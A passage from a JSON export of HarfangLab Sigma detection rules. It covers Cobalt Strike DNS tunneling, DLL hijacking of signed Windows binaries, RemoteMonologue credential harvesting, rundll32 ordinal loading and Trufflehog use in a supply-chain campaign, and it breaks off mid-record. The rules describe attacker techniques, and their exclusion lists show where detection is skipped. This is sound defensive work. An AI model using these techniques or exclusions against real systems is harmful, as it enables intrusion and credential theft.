"rule_description": "Detects suspicious DNS query patterns associated with Cobalt Strike DNS tunneling.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nIt is recommended analyze the process responsible for the DNS request to determine whether it is indeed a Cobalt Strike beacon and to isolate infected hosts if necessary.\n",
"rule_creation_date": "2023-03-23",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "693f999d-5ae3-4651-ac76-03a163015af9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080855Z",
"creation_date": "2026-03-23T11:45:34.080857Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080862Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_ssp.yml",
"content": "title: DLL Hijacking via rmactivate_ssp.exe\nid: 693f999d-5ae3-4651-ac76-03a163015af9\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_ssp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_ssp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "693f999d-5ae3-4651-ac76-03a163015af9",
"rule_name": "DLL Hijacking via rmactivate_ssp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_ssp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6949760c-fa90-4519-9761-a914b1c49414",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589762Z",
"creation_date": "2026-03-23T11:45:34.589766Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589778Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_openfiles.yml",
"content": "title: DLL Hijacking via openfiles.exe\nid: 6949760c-fa90-4519-9761-a914b1c49414\ndescription: |\n Detects potential Windows DLL Hijacking via openfiles.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'openfiles.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6949760c-fa90-4519-9761-a914b1c49414",
"rule_name": "DLL Hijacking via openfiles.exe",
"rule_description": "Detects potential Windows DLL Hijacking via openfiles.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6961dfa8-1eda-47fe-98ee-2eb179e41bb3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095356Z",
"creation_date": "2026-03-23T11:45:34.095358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095363Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/RemoteMonologue/",
"https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions",
"https://github.com/xforcered/RemoteMonologue",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "t1187_remote_monologue.yml",
"content": "title: Credential Harvesting via Remote Monologue Detected\nid: 6961dfa8-1eda-47fe-98ee-2eb179e41bb3\ndescription: |\n Detects a registry modification related to the RemoteMonologue attack technique setup.\n RemoteMonologue is a Windows credential harvesting technique that enables remote user compromise by leveraging the Interactive User RunAs key and coercing NTLM authentications via DCOM.\n It is recommended to check the source user and workstation of the modification for any suspicious activities with the help of the session information card in the security event.\nreferences:\n - https://github.com/xforcered/RemoteMonologue/\n - https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://github.com/xforcered/RemoteMonologue\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/04/09\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.RemoteMonologue\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKCR\\AppID\\{????-????-????-????-????????????}\\RunAs'\n Details: 'Interactive User'\n Image: '?:\\windows\\system32\\svchost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6961dfa8-1eda-47fe-98ee-2eb179e41bb3",
"rule_name": "Credential Harvesting via Remote Monologue Detected",
"rule_description": "Detects a registry modification related to the RemoteMonologue attack technique setup.\nRemoteMonologue is a Windows credential harvesting technique that enables remote user compromise by leveraging the Interactive User RunAs key and coercing NTLM authentications via DCOM.\nIt is recommended to check the source user and workstation of the modification for any suspicious activities with the help of the session information card in the security event.\n",
"rule_creation_date": "2025-04-09",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1187"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69751146-8ab0-4b09-9bef-03ed928fc3f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071829Z",
"creation_date": "2026-03-23T11:45:34.071831Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071836Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_load_dll_by_ordinal.yml",
"content": "title: Suspicious DLL Loaded by Ordinal\nid: 69751146-8ab0-4b09-9bef-03ed928fc3f5\ndescription: |\n Detects a suspicious execution of \"Rundll32.exe\" to load a DLL by specifying the function using an ordinal instead of a function name.\n This can be used by an attackers to evade command-line based detection.\n It is recommended to investigate the DLL loaded by \"Rundll32.exe\" as well as the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/03/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_ordinal:\n CommandLine|contains:\n - ' #'\n - ',#'\n - ', #'\n\n # Exclude cases where you have a '#' in one the arguments of the DLL call e.g.:\n # C:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL C:\\Users\\USER\\Documents\\Tartine #6.pdf\n exclusion_hashtag_filename:\n CommandLine|re: '(?i).*rundll32\\.exe\\s.+\\.dll,\\s{0,1}[^#]+\\s.*#[0-9]+.*'\n\n exclusion_edgehtml:\n CommandLine: '*:\\WINDOWS\\SYSTEM32\\EDGEHTML.dll*'\n CommandLine|contains:\n - ',#125'\n - ',#133'\n - ',#140'\n - ',#141'\n\n exclusion_known_fp:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\Contour Pointing Devices\\ContourMouse.cpl,'\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\shell32.dll,Control_RunDLL ?:\\windows\\SysWOW64\\javacpl.cpl,Java'\n - 'rundll32.exe V0230Cvw.dll,ctCVWConsoleRunDLL32EP Live! Cam Video IM Pro #7'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\IBM\\RationalSDLC\\ClearCase\\bin\\cc.cpl,ClearCase'\n - '*RunDLL32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpinksts????.dll,RunDLLEntry*'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\\\*.cpl,*'\n - '?:\\Windows\\system32\\rundll32.exe portabledeviceapi.dll,#1'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\ntmaes\\cbase.cpl,*'\n\n exclusion_office:\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\PROGRA~2\\MICROS~1\\Office16\\MLCFG32.CPL,@0\n CommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\shell32.dll'\n - '#44'\n - '\\Office1?\\MLCFG32.CPL'\n\n exclusion_uxtheme:\n # rundll32.exe uxtheme.dll,#64 C:\\Windows\\resources\\Themes\\Aero\\Aero.msstyles?NormalColor?NormalSize\n # rundll32.exe uxtheme.dll,#64 C:\\windows\\resources\\themes\\Aero\\AeroLite.msstyles?NormalColor?NormalSize\n CommandLine|contains|all:\n - 'uxtheme.dll'\n - '#64'\n - '?:\\Windows\\resources\\Themes\\Aero\\Aero'\n\n exclusion_nvidia:\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #14 4560 -org=Unknown\n # C:\\Windows\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #15 2824 -org=ServiceRestart\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #13 21404 -org=DriverReload\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\NVIDIA App\\ShadowPlay\\nvspapi64.dll #14 12116 -org=Unknown\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\WINDOWS\\system32\\nvspcap64.dll #14 4180\n CommandLine:\n - '*:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll*'\n - '*:\\Program Files\\NVIDIA Corporation\\NVIDIA App\\ShadowPlay\\nvspapi64.dll*'\n - '*:\\WINDOWS\\system32\\nvspcap64.dll*'\n CommandLine|contains:\n - '#13'\n - '#14'\n - '#15'\n\n exclusion_seagull:\n # rundll32 C:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init TOSHIBA B-EX4T1-G #2 -i\n # rundll32 C:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init Datamax-O'Neil E-4205A Mark III #2 -i\n CommandLine|contains: '?:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init'\n ParentImage: '?:\\Windows\\ssdal.exe'\n\n exclusion_hotplug_saferemove:\n # C:\\windows\\System32\\RunDll32.exe C:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification #OMNICANAL (F:)\n CommandLine|contains: '?:\\windows\\System32\\RunDll32.exe ?:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n\n exclusion_ibm_iaccess:\n # C:\\windows\\SysWOW64\\rundll32.exe C:\\windows\\SysWOW64\\shell32.dll,#44 C:\\windows\\SysWOW64\\ca400cpl.cpl,IBM i Access for Windows\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Windows\\SysWOW64\\ca400cpl.cpl,\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\ca400cpl.cpl,'\n\n exclusion_sage_installation:\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Program Files (x86)\\Common Files\\Sage\\cbinst32.cpl,Sage Installation\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\Common Files\\Sage\\cbinst32.cpl,'\n\n exclusion_fasttrack_software:\n # rundll32.exe C:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper32.dll,#1\n # rundll32.exe C:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper64.dll,#1\n CommandLine|contains:\n - 'rundll32.exe ?:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper32.dll,#1'\n - 'rundll32.exe ?:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper64.dll,#1'\n\n exclusion_borland_bdeadmin:\n # child process is C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\BDEADMIN.EXE\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Windows\\SysWOW64\\BDEADMIN.CPL,Administrateur BDE\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\BDEADMIN.CPL,'\n\n exclusion_msbuild_filetracker:\n CommandLine:\n - 'rundll32.exe ?:\\Program Files (x86)\\MSBuild\\\\*\\FileTracker\\FileTracker32.dll,#1'\n - 'rundll32.exe ?:\\Program Files (x86)\\MSBuild\\\\*\\FileTracker\\FileTracker64.dll,#1'\n\n exclusion_xwaymgr:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 xwaymgr.cpl'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 ?:\\WINDOWS\\SYSTEM32\\XWAYMGR.CPL'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 ?:\\Windows\\System32\\XWAYMgr.cpl,'\n\n exclusion_docrouter:\n CommandLine: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 *\\DocRouter\\DocRouterCfg.cpl,Inge-Com DocRouter'\n\n exclusion_faxslauncher:\n CommandLine: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 *\\RightFax\\Shared Files\\FaxsLauncher.cpl,RightFax Server'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69751146-8ab0-4b09-9bef-03ed928fc3f5",
"rule_name": "Suspicious DLL Loaded by Ordinal",
"rule_description": "Detects a suspicious execution of \"Rundll32.exe\" to load a DLL by specifying the function using an ordinal instead of a function name.\nThis can be used by an attackers to evade command-line based detection.\nIt is recommended to investigate the DLL loaded by \"Rundll32.exe\" as well as the parent process for suspicious activities.\n",
"rule_creation_date": "2022-03-16",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "698ab38b-da07-4635-805e-dfbdaab8e6e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588496Z",
"creation_date": "2026-03-23T11:45:34.588501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588513Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runas.yml",
"content": "title: DLL Hijacking via RUNAS.exe\nid: 698ab38b-da07-4635-805e-dfbdaab8e6e7\ndescription: |\n Detects potential Windows DLL Hijacking via RUNAS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNAS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\netutils.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "698ab38b-da07-4635-805e-dfbdaab8e6e7",
"rule_name": "DLL Hijacking via RUNAS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RUNAS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69da9a0f-114f-4a09-afa3-1b7ade5b394d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070861Z",
"creation_date": "2026-03-23T11:45:34.070863Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_linux.yml",
"content": "title: Trufflehog Executed (Linux)\nid: 69da9a0f-114f-4a09-afa3-1b7ade5b394d\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Trufflehog\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Collection\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/trufflehog'\n\n exclusion_commandline:\n CommandLine|contains: '/trufflehog filesystem --json --fail --only-verified --no-update '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69da9a0f-114f-4a09-afa3-1b7ade5b394d",
"rule_name": "Trufflehog Executed (Linux)",
